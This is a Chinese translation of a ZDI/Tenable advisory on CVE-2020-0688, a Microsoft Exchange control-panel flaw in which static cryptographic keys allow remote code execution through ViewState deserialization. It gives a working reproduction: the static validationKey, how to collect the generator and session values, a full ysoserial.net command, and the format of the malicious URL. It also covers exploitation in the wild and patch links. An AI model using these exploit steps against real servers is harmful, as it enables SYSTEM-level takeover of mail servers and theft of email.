概述

在2020年2月发布的最新微软月度补丁程序中，Microsoft发布了一个重要的补丁程序，以修复Microsoft Exchange服务器中的远程代码执行漏洞。该漏洞由一位匿名研究人员报告给我们，影响Microsoft Exchange服务器的所有受支持版本，在2月的补丁中实现修复。

视频地址：https://youtu.be/7d_HoQ0LVy8

最初，Microsoft表示该漏洞是由于内存损坏漏洞引起的，并且可以通过将特制的电子邮件发送到易受攻击的Exchange服务器的方式利用这一漏洞。此后，Microsoft已经将Write-up的内容进行修改，目前表示该漏洞是由于Exchange Server在安装时未能正确创建唯一的加密密钥所导致的。

漏洞复现过程

具体而言，该漏洞是在Exchange控制面板（ECP）组件中发现的。这一漏洞的性质非常简单。Microsoft Exchange Server不会针对每个安装随机生成密钥，而是在web.config中包含相同的validationKey和decryptionKey值。这些密钥用于为ViewState提供安全性。ViewState是ASP.NET Web应用程序在客户端上以序列化格式存储的服务器端数据。客户端通过__VIEWSTATE请求参数将这个数据返回给服务器。

包含静态validationKey的web.config文件的摘要：

由于使用了静态密钥，经过身份验证的攻击者可以诱导服务器对精心制作的恶意ViewState数据进行反序列化。借助YSoSerial.net，攻击者可以在Exchange控制面板Web应用程序的上下文中，在服务器上执行任意.NET代码，该代码将以SYSTEM的权限运行。

要利用这个漏洞，我们需要从经过身份验证的会话中收集ViewStateUserKey和__VIEWSTATEGENERATOR值。可以从ASP.NET _SessionID Cookie中获得ViewStateUserKey，位于其中的一个隐藏字段。我们使用浏览器中的标准开发人员工具，就可以轻松得到这些信息。

首先，访问/ecp/default.aspx页面并登录。我们使用的帐户不需要具有任何特殊权限。在这里的示例中，我们使用一个名为user的帐户：

在继续下一步之前，我们需要收集一些信息。其中最关键的信息我们目前已经得到了：

validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
validationalg = SHA1

要获取ViewStateUserKey和__VIEWSTATEGENERATOR，我们可以打开“开发工具”（F12）的“网络”选项卡，然后按F5重新发送请求。在登录时，我们需要响应/ecp/default.aspx的原始请求：

如我们所见，__VIEWSTATEGENERATOR值可以直接在页面源代码中查看到。在我们的示例中，该值为B97B4E27。实际上，大家在漏洞复现中得到的值很有可能是相同的。接下来，打开“标头”选项卡，在“请求”中找到ASP.NET_SessionId Cookie：

在这个样本中，其值是05ae4b41-51e1-4c3a-9241-6b87b169d663。

现在，我们已经掌握了攻击前需要得到的所有信息：

--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
--validationalg = SHA1
--generator = B97B4E27
--viewstateuserkey = 05ae4b41-51e1-4c3a-9241-6b87b169d663

下一步是使用ysoserial.net生成ViewState Payload。我们将通过创建文件C:\Vuln_Server.txt来生成一个Payload，以演示代码的执行情况：

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/Vuln_Server.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

最后，我们需要对ViewState Payload进行URL编码，并按照以下的格式构造URL：

/ecp/default.aspx?__VIEWSTATEGENERATOR=< generator >&__VIEWSTATE=< ViewState >

替换生成器和上面获得的URL编码的ViewState。

然后，我们只需将结果URL粘贴到浏览器地址栏中，就可以将其提交给Exchange服务器：

服务器返回500未预期的错误，但实际攻击成功。我们可以查看对目标服务器产生的影响：

果然，文件Vuln_Server.txt目前已经存在。我们检查该文件的所有者信息，确认该文件是由具有SYSTEM token的进程创建的。

这表明，攻击者可以以SYSTEM身份执行任意代码，并能够完全破坏目标Exchange服务器。

漏洞详细分析

根据ZDI研究人员的研究结果，由于Microsoft Exchange Server安装在Web配置（web.config）的MachineKeySection中具有相同的validationKey和decryptionKey。这些密钥用于保护以序列化形式存储在ViewState中的服务器端数据，这些数据作为来自客户端请求的一部分，包含在“__VIEWSTATE”参数中。这个参数可能听上去非常熟悉，因为在最近Microsoft SQL Server Reporting Services中的一个不正确输入验证漏洞中，就涉及到通过VIEWSTATE参数序列化不受信任的数据。

要生成恶意请求，攻击者需要获取以下参数值：

validationKey（位于System.Web.Configuration）

validation（位于System.Web.Configuration）

VIEWSTATEGENERATOR（位于Exchange控制面板）

ASP.NET_SessionId（请求标头的Cookie字段）

尽管前两个参数是静态的，并且容易获得，但后两个参数要求攻击者使用有效的用户凭据登录易受攻击的ECP实例。只有这样，攻击者才能从HTML源代码和请求标头Cookie字段中捕获这些参数。

一旦攻击者获得了这些值，就可以使用ysoserial.net生成序列化的Payload，作为对易受攻击的ECP实例恶意请求中的一部分。

安全研究员Kevin Beaumont指出，攻击者如果要获取身份验证，并不是一个太大的障碍。目前网络上已经公开发布一些工具，可以从LinkedIn页面捕获员工信息，并尝试使用一些常用的凭据，在Outlook Web Access（OWA）上进行登录尝试。Beaumont表示，这些工具用于主动攻击，以获取OWA和ECP访问权限。

攻击者的漏洞利用情况

实际上，Microsoft提供了一种通过OWA和ECP的登录页面来识别Exchange Server内部版本号的方法，从而使攻击者可以识别出哪些服务器存在CVE-2020-0688漏洞。

Beaumont通过样本发现，组织修复Exchange Server实例中漏洞的频率基本上是几年才进行一次，甚至都不是几个月修复一次。

而在ZDI发布文章后不久，就有攻击者开始针对这一漏洞进行利用，尝试攻击存在漏洞的Microsoft Exchange Server。

Bad Packets首席研究官Tony Mursch在推特上说，此漏洞的大规模扫描行动已经开始。

漏洞修复方案

Microsoft在2020年2月11日发布的补丁程序中，已经提供了Microsoft Exchange Server 2010、2013、2016和2019的补丁程序。尽管未经证实，但该漏洞很可能也影响Microsoft Exchange Server 2017，该版本的支持服务在2017年4月终止。

Microsoft Exchange服务器版本和微软支持文章：

2010 Service Pack 3     https://support.microsoft.com/help/4536989

2013 Cumulative Update 23 https://support.microsoft.com/help/4536988

2016 Cumulative Update 14      https://support.microsoft.com/help/4536987

2016 Cumulative Update 15 https://support.microsoft.com/help/4536987

2019 Cumulative Update 3  https://support.microsoft.com/help/4536987

2019 Cumulative Update 4  https://support.microsoft.com/help/4536987

总结

Microsoft在2020年2月补丁中，已经修复了这个编号为CVE-2020-0688的漏洞。根据微软发布的文章，他们通过“更正Microsoft Exchange在安装过程中创建密钥的方式”来修复这个漏洞。换而言之，现在Microsoft在安装过程中已经改为对加密密钥进行随机化。针对漏洞等级，Microsoft将这个漏洞评估为“重要”（Important），这可能是因为攻击者必须首先进行身份验证。但是，应该注意的是，在企业内部环境，几乎是所有用户都具有Exchange服务器的身份验证权限。因此，任何成功攻陷设备，或获得企业中某个用户凭据的攻击者都可以接管Exchange服务器。在获取服务器权限之后，攻击者可以随意查看、泄露或伪造公司内部电子邮件通信。因此，如果您是Exchange管理员，应将其视为一个严重漏洞，在测试完成后立即进行补丁的安装。Microsoft提出的漏洞利用指数为1，这表示他们预计在补丁发出的30天之内就可以看到漏洞利用，事实上也确实如此。

我们要感谢这位匿名研究人员向ZDI报告了此漏洞，同时为这篇文章提供了许多有用信息。

各位读者可以关注推特帐户@HexKitchen，关注我们的团队以获取最新的漏洞利用技术和安全补丁。

本文翻译自：https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keyshttps://zh-cn.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution?tns_redirect=true如若转载，请注明原文地址：